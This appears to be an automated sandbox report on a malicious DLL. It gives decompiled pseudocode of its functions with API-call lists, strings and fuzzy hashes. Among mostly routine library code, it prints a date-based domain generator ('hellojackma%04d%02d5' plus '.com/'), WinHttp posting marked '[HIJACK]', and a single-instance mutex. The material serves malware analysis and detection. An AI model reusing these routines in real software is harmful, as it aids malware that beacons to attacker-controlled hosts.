                                                                                                                                                                  					 *((intOrPtr*)(_t110 - 4)) = 0xffffffff;
                                                                                                                                                                  					E100011A0(_t110 - 0x80);
                                                                                                                                                                  					 *[fs:0x0] =  *((intOrPtr*)(_t110 - 0xc));
                                                                                                                                                                  					return  *((intOrPtr*)(_t110 + 8));
                                                                                                                                                                  					L6:
                                                                                                                                                                  				}
                                                                                                                                                                  			}









                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 10022710: _memset.LIBCMT ref: 1002276B
                                                                                                                                                                    • Part of subcall function 10022710: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 1002278C
                                                                                                                                                                  • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000061,00000000,?,?,?,info=,10025CA2), ref: 10022EBA
                                                                                                                                                                    • Part of subcall function 1001F230: _memset.LIBCMT ref: 1001F25B
                                                                                                                                                                    • Part of subcall function 1001F230: OutputDebugStringA.KERNEL32(?,?,?,?,?,10022D49,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F293
                                                                                                                                                                    • Part of subcall function 10021C30: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021D64
                                                                                                                                                                    • Part of subcall function 10021C30: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021DAC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Http_memset$DebugFileFindLocalNameOpenOptionOutputPathStringTime
                                                                                                                                                                  • String ID: .\post_info.cpp$[HIJACK][%s][%s][%d]: url = %s$post_info
                                                                                                                                                                  • API String ID: 4078257140-115957201
                                                                                                                                                                  • Opcode ID: 536ff6acf1412ecd6a85183df319c154ebfa3d59a51a68a5e205cc1e31637370
                                                                                                                                                                  • Instruction ID: 4cd3f4f778056951b5cfd2b5c12ca28e1b0ee278467a54424c11d59ecdb1d103
                                                                                                                                                                  • Opcode Fuzzy Hash: 536ff6acf1412ecd6a85183df319c154ebfa3d59a51a68a5e205cc1e31637370
                                                                                                                                                                  • Instruction Fuzzy Hash: C1413D75D11248ABEB18DB94CC92FEDBB74EF18384F5080A8F60A77195EB302A45CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E100181BA(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				char _v20;
                                                                                                                                                                  				char _t43;
                                                                                                                                                                  				char _t46;
                                                                                                                                                                  				signed int _t53;
                                                                                                                                                                  				signed int _t54;
                                                                                                                                                                  				intOrPtr _t56;
                                                                                                                                                                  				intOrPtr _t57;
                                                                                                                                                                  				int _t58;
                                                                                                                                                                  				signed short* _t59;
                                                                                                                                                                  				short* _t60;
                                                                                                                                                                  				int _t65;
                                                                                                                                                                  				char* _t72;
                                                                                                                                                                  
                                                                                                                                                                  				_t72 = _a8;
                                                                                                                                                                  				if(_t72 == 0 || _a12 == 0) {
                                                                                                                                                                  					L5:
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					if( *_t72 != 0) {
                                                                                                                                                                  						E1000D555( &_v20, __edi, _a16);
                                                                                                                                                                  						_t43 = _v20;
                                                                                                                                                                  						__eflags =  *(_t43 + 0x14);
                                                                                                                                                                  						if( *(_t43 + 0x14) != 0) {
                                                                                                                                                                  							_t46 = E10013A7B( *_t72 & 0x000000ff,  &_v20);
                                                                                                                                                                  							__eflags = _t46;
                                                                                                                                                                  							if(_t46 == 0) {
                                                                                                                                                                  								__eflags = _a4;
                                                                                                                                                                  								_t40 = _v20 + 4; // 0x840ffff8
                                                                                                                                                                  								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                                                  									L10:
                                                                                                                                                                  									__eflags = _v8;
                                                                                                                                                                  									if(_v8 != 0) {
                                                                                                                                                                  										_t53 = _v12;
                                                                                                                                                                  										_t11 = _t53 + 0x70;
                                                                                                                                                                  										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                                                  										__eflags =  *_t11;
                                                                                                                                                                  									}
                                                                                                                                                                  									return 1;
                                                                                                                                                                  								}
                                                                                                                                                                  								L21:
                                                                                                                                                                  								_t54 = E1000F780(__eflags);
                                                                                                                                                                  								 *_t54 = 0x2a;
                                                                                                                                                                  								__eflags = _v8;
                                                                                                                                                                  								if(_v8 != 0) {
                                                                                                                                                                  									_t54 = _v12;
                                                                                                                                                                  									_t33 = _t54 + 0x70;
                                                                                                                                                                  									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                                  									__eflags =  *_t33;
                                                                                                                                                                  								}
                                                                                                                                                                  								return _t54 | 0xffffffff;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t56 = _v20;
                                                                                                                                                                  							_t15 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                                  							_t65 =  *_t15;
                                                                                                                                                                  							__eflags = _t65 - 1;
                                                                                                                                                                  							if(_t65 <= 1) {
                                                                                                                                                                  								L17:
                                                                                                                                                                  								_t24 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                                  								__eflags = _a12 -  *_t24;
                                                                                                                                                                  								if(__eflags < 0) {
                                                                                                                                                                  									goto L21;
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags = _t72[1];
                                                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                                                  									goto L21;
                                                                                                                                                                  								}
                                                                                                                                                                  								L19:
                                                                                                                                                                  								__eflags = _v8;
                                                                                                                                                                  								_t27 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                                  								_t57 =  *_t27;
                                                                                                                                                                  								if(_v8 == 0) {
                                                                                                                                                                  									return _t57;
                                                                                                                                                                  								}
                                                                                                                                                                  								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                                  								return _t57;
                                                                                                                                                                  							}
                                                                                                                                                                  							__eflags = _a12 - _t65;
                                                                                                                                                                  							if(_a12 < _t65) {
                                                                                                                                                                  								goto L17;
                                                                                                                                                                  							}
                                                                                                                                                                  							__eflags = _a4;
                                                                                                                                                                  							_t21 = _t56 + 4; // 0x840ffff8
                                                                                                                                                                  							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                  							__eflags = _t58;
                                                                                                                                                                  							_t56 = _v20;
                                                                                                                                                                  							if(_t58 != 0) {
                                                                                                                                                                  								goto L19;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L17;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t59 = _a4;
                                                                                                                                                                  						__eflags = _t59;
                                                                                                                                                                  						if(_t59 != 0) {
                                                                                                                                                                  							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L10;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t60 = _a4;
                                                                                                                                                                  						if(_t60 != 0) {
                                                                                                                                                                  							 *_t60 = 0;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L5;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  			}


















APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 100181EA
• __isleadbyte_l.LIBCMT ref: 1001821E
• MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,10016BDE,?,?,00000002), ref: 1001824F
• MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,10016BDE,?,?,00000002), ref: 100182BD

Memory Dump Source
• Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
• Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
• Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
• Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
• Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp

Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 055a8c03e4689a610b2b33372239977322d8b4542b05d195dfabf953701ab400
• Instruction ID: d5078d4910217e7b4ecb4b559098acf50bee0a5cb4f006de64edc12b54e59432
• Opcode Fuzzy Hash: 055a8c03e4689a610b2b33372239977322d8b4542b05d195dfabf953701ab400
• Instruction Fuzzy Hash: 6131B031A00256EFDB12CFA4CC84AAE7BF9FF01251F168569E8609F091E730DB81DB51

Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A3D0(void* __ebx, void* __edi, void* __esi, char* _a4) {
                                                                                                                                                                  				int _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				short* _v16;
                                                                                                                                                                  
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v12 = E1000CAD0(_a4);
                                                                                                                                                                  				_v8 = MultiByteToWideChar(0, 0, _a4, _v12, 0, 0);
                                                                                                                                                                  				_t9 = _v8 + 2; // 0x2
                                                                                                                                                                  				_v16 = L1000CEAF(__ebx, _a4, __edi, __esi, _v8 + _t9);
                                                                                                                                                                  				_t13 = _v8 + 2; // 0x2
                                                                                                                                                                  				E1000CF80(__edi, _v16, 0, _v8 + _t13);
                                                                                                                                                                  				MultiByteToWideChar(0, 0, _a4, _v12, _v16, _v8);
                                                                                                                                                                  				_v16[_v8] = 0;
                                                                                                                                                                  				return _v16;
                                                                                                                                                                  			}







                                                                                                                                                                  APIs
                                                                                                                                                                  • _strlen.LIBCMT ref: 1001A3E1
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3FC
                                                                                                                                                                  • _memset.LIBCMT ref: 1001A426
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A442
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$_memset_strlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 745779501-0
                                                                                                                                                                  • Opcode ID: 2e3c2576653a9b42fdd310f43433bf8f26c3ae11fa9d2da111245d4e24b55a0e
                                                                                                                                                                  • Instruction ID: 8dd7a9ca22c507c9c9ca29094530ba01303feab9f029a6df08f7648fa224dc70
                                                                                                                                                                  • Opcode Fuzzy Hash: 2e3c2576653a9b42fdd310f43433bf8f26c3ae11fa9d2da111245d4e24b55a0e
                                                                                                                                                                  • Instruction Fuzzy Hash: 1D11F1B9E00208BFEB14CFD4D895F9EB7B4EB48704F108198FA099B381D671AA058B91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E1001F5D0() {
                                                                                                                                                                  				struct _FILETIME _v12;
                                                                                                                                                                  				struct _SYSTEMTIME _v28;
                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                                  				struct _SYSTEMTIME _v52;
                                                                                                                                                                  				struct _FILETIME _v60;
                                                                                                                                                                  				intOrPtr _t31;
                                                                                                                                                                  
                                                                                                                                                                  				_v28.wYear = 0x7b2;
                                                                                                                                                                  				_v28.wMonth = 1;
                                                                                                                                                                  				_v28.wDay = 1;
                                                                                                                                                                  				_v28.wHour = 0;
                                                                                                                                                                  				_v28.wMinute = 0;
                                                                                                                                                                  				_v28.wSecond = 0;
                                                                                                                                                                  				_v28.wMilliseconds = 0;
                                                                                                                                                                  				GetSystemTime( &_v52);
                                                                                                                                                                  				SystemTimeToFileTime( &_v52,  &_v12);
                                                                                                                                                                  				SystemTimeToFileTime( &_v28,  &_v60);
                                                                                                                                                                  				_t31 = _v12.dwLowDateTime - _v60.dwLowDateTime;
                                                                                                                                                                  				asm("sbb eax, [ebp-0x34]");
                                                                                                                                                                  				_v36 = E1000F2F0(_t31, _v12.dwHighDateTime, 0x2710, 0);
                                                                                                                                                                  				_v32 = _t31;
                                                                                                                                                                  				return _v36;
                                                                                                                                                                  			}











                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 1001F604
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 1001F612
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F620
                                                                                                                                                                  • __aulldiv.LIBCMT ref: 1001F63B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$System$File$__aulldiv
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3735792614-0
                                                                                                                                                                  • Opcode ID: 56842ad1edb196f60ab411e144c2dfedf5549195354fdd3cd1ae5dcdf75a643e
                                                                                                                                                                  • Instruction ID: af96395ebe124ed86fc63cf5983e6bcf699a861f8abc8f1b8a76f2a7ba2cf47c
                                                                                                                                                                  • Opcode Fuzzy Hash: 56842ad1edb196f60ab411e144c2dfedf5549195354fdd3cd1ae5dcdf75a643e
                                                                                                                                                                  • Instruction Fuzzy Hash: A501E575D1021DEADB00DFD4C8899EEB7B8FF04304F104649E904A7250EB79668ACB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A150(CHAR* _a4) {
                                                                                                                                                                  				struct _SECURITY_DESCRIPTOR _v24;
                                                                                                                                                                  				void* _v28;
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES _v40;
                                                                                                                                                                  				int _v44;
                                                                                                                                                                  
                                                                                                                                                                  				_v44 = 0;
                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                  				InitializeSecurityDescriptor( &_v24, 1);
                                                                                                                                                                  				SetSecurityDescriptorDacl( &_v24, 1, 0, 0);
                                                                                                                                                                  				_v40.nLength = 0xc;
                                                                                                                                                                  				_v40.bInheritHandle = 1;
                                                                                                                                                                  				_v40.lpSecurityDescriptor =  &_v24;
                                                                                                                                                                  				_v28 = CreateMutexA( &_v40, 0, _a4);
                                                                                                                                                                  				if(_v28 != 0 && GetLastError() == 0xb7) {
                                                                                                                                                                  					_v44 = 1;
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v44;
                                                                                                                                                                  			}








                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1001A16A
                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 1001A17A
                                                                                                                                                                  • CreateMutexA.KERNEL32(0000000C,00000000,100206C4), ref: 1001A19E
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 1001A1AD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4085719312-0
                                                                                                                                                                  • Opcode ID: dfe9d4db1a26c01aa306363c359991dbed2ed50b1dc0d3df9fdb4fd6b1ce982a
                                                                                                                                                                  • Instruction ID: 3bb7ca3d3a89cab5a40ee6ca153f8139473754825ab1ab767a0ca4e665a0d5f7
                                                                                                                                                                  • Opcode Fuzzy Hash: dfe9d4db1a26c01aa306363c359991dbed2ed50b1dc0d3df9fdb4fd6b1ce982a
                                                                                                                                                                  • Instruction Fuzzy Hash: EC01BB71940309DFEB10DFD0C989BEDBBB4EB08315F600504EA05BA290D7B5AAC5CBA6
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E10022BBB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                  				void* _t71;
                                                                                                                                                                  				void* _t78;
                                                                                                                                                                  
                                                                                                                                                                  				_t78 = __eflags;
                                                                                                                                                                  				_push( *(_t71 - 0x1e) & 0x0000ffff);
                                                                                                                                                                  				E1000CCA3(__edi, _t71 - 0x12c, "hellojackma%04d%02d5",  *(_t71 - 0x20) & 0x0000ffff);
                                                                                                                                                                  				 *((intOrPtr*)(_t71 - 0x10)) = E1001A4E0(__ebx,  *(_t71 - 0x20) & 0x0000ffff, __edi, __esi, _t78, _t71 - 0x12c);
                                                                                                                                                                  				 *((intOrPtr*)(_t71 - 0x2f4)) = E10001160(_t71 - 0x27c, _t78,  *((intOrPtr*)(_t71 - 0x10)));
                                                                                                                                                                  				 *((intOrPtr*)(_t71 - 0x2f8)) =  *((intOrPtr*)(_t71 - 0x2f4));
                                                                                                                                                                  				 *((char*)(_t71 - 4)) = 0xb;
                                                                                                                                                                  				E10001A90(_t71 - 0x148,  *((intOrPtr*)(_t71 - 0x2f8)));
                                                                                                                                                                  				 *((char*)(_t71 - 4)) = 0;
                                                                                                                                                                  				E100011A0(_t71 - 0x27c);
                                                                                                                                                                  				_push( *((intOrPtr*)(_t71 - 0x10)));
                                                                                                                                                                  				E1000CA40(__ebx, __edi, __esi, _t78);
                                                                                                                                                                  				 *((intOrPtr*)(_t71 - 0x2fc)) = E10001160(_t71 - 0x298, _t78, ".com/");
                                                                                                                                                                  				 *((intOrPtr*)(_t71 - 0x300)) =  *((intOrPtr*)(_t71 - 0x2fc));
                                                                                                                                                                  				 *((char*)(_t71 - 4)) = 0xc;
                                                                                                                                                                  				E10001A90(_t71 - 0x148,  *((intOrPtr*)(_t71 - 0x300)));
                                                                                                                                                                  				 *((char*)(_t71 - 4)) = 0;
                                                                                                                                                                  				E100011A0(_t71 - 0x298);
                                                                                                                                                                  				E10001110( *((intOrPtr*)(_t71 + 8)), _t78, _t71 - 0x148);
                                                                                                                                                                  				 *(_t71 - 0x29c) =  *(_t71 - 0x29c) | 0x00000001;
                                                                                                                                                                  				 *((intOrPtr*)(_t71 - 4)) = 0xffffffff;
                                                                                                                                                                  				E100011A0(_t71 - 0x148);
                                                                                                                                                                  				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
                                                                                                                                                                  				return  *((intOrPtr*)(_t71 + 8));
                                                                                                                                                                  			}






                                                                                                                                                                  APIs
                                                                                                                                                                  • _sprintf.LIBCMT ref: 10022BD1
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A51B
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A52E
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A53A
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A55D
                                                                                                                                                                    • Part of subcall function 1001A4E0: _sprintf.LIBCMT ref: 1001A5CC
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A616
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                    • Part of subcall function 1000CA40: RtlFreeHeap.NTDLL(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                    • Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID: .com/$hellojackma%04d%02d5
                                                                                                                                                                  • API String ID: 2531412260-1062581820
                                                                                                                                                                  • Opcode ID: bc693b2650d3238bdf810681ac114147c8c26e9283bc14e46fbf12d121a0d9eb
                                                                                                                                                                  • Instruction ID: cd4cb29569ec0e2556b74841a2cacae5ea17faf8370a901a59aadef40f2aa25d
                                                                                                                                                                  • Opcode Fuzzy Hash: bc693b2650d3238bdf810681ac114147c8c26e9283bc14e46fbf12d121a0d9eb
                                                                                                                                                                  • Instruction Fuzzy Hash: F4211575C011299BEB28DB64CC55BEEB7B4EF48380F5081E9E51D63251EB306B84CF51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                  			E1000443C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                  				intOrPtr* _t20;
                                                                                                                                                                  				intOrPtr* _t23;
                                                                                                                                                                  				void* _t25;
                                                                                                                                                                  				void* _t26;
                                                                                                                                                                  				void* _t27;
                                                                                                                                                                  
                                                                                                                                                                  				_t27 = __eflags;
                                                                                                                                                                  				_push(0x44);
                                                                                                                                                                  				E1000F06B(E10022FB8, __ebx, __edi, __esi);
                                                                                                                                                                  				E10001160(_t25 - 0x28, _t27, "invalid string position");
                                                                                                                                                                  				_t2 = _t25 - 4;
                                                                                                                                                                  				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                                                                  				_t20 = _t25 - 0x50;
                                                                                                                                                                  				E10001DF0(_t20,  *_t2, _t25 - 0x28);
                                                                                                                                                                  				 *((intOrPtr*)(_t25 - 0x50)) = 0x100242c8;
                                                                                                                                                                  				E1000EC4B(_t25 - 0x50, 0x10331468);
                                                                                                                                                                  				asm("int3");
                                                                                                                                                                  				_push(__esi);
                                                                                                                                                                  				_t23 = _t20;
                                                                                                                                                                  				E10001F50(_t20,  *((intOrPtr*)(_t26 + 8)));
                                                                                                                                                                  				 *_t23 = 0x100242c8;
                                                                                                                                                                  				return _t23;
                                                                                                                                                                  			}









                                                                                                                                                                  APIs
                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10004443
                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 10004475
                                                                                                                                                                    • Part of subcall function 1000EC4B: RaiseException.KERNEL32(?,?,1000CCA2,100019D3,?,?,?,?,1000CCA2,100019D3,10331A60,103352E0), ref: 1000EC8B
                                                                                                                                                                    • Part of subcall function 10001F50: std::exception::exception.LIBCMT ref: 10001F73
                                                                                                                                                                  Strings
                                                                                                                                                                  • invalid string position, xrefs: 10004448
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionException@8H_prolog3RaiseThrowstd::exception::exception
                                                                                                                                                                  • String ID: invalid string position
                                                                                                                                                                  • API String ID: 2977319401-1799206989
                                                                                                                                                                  • Opcode ID: 8a38253c4c6a58d41603c5e0b19f6e40374d81d82671ff6e0ca88bff6985b20b
                                                                                                                                                                  • Instruction ID: e86674a8940bf3c69d49669cad452c3bb0f00751fa4d3b8ebb3f475700820a46
                                                                                                                                                                  • Opcode Fuzzy Hash: 8a38253c4c6a58d41603c5e0b19f6e40374d81d82671ff6e0ca88bff6985b20b
                                                                                                                                                                  • Instruction Fuzzy Hash: D5E06DB5500168EBD704DBD4EC41ADEB778EF44391FC2092AF244A7149CF75A909CB64
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%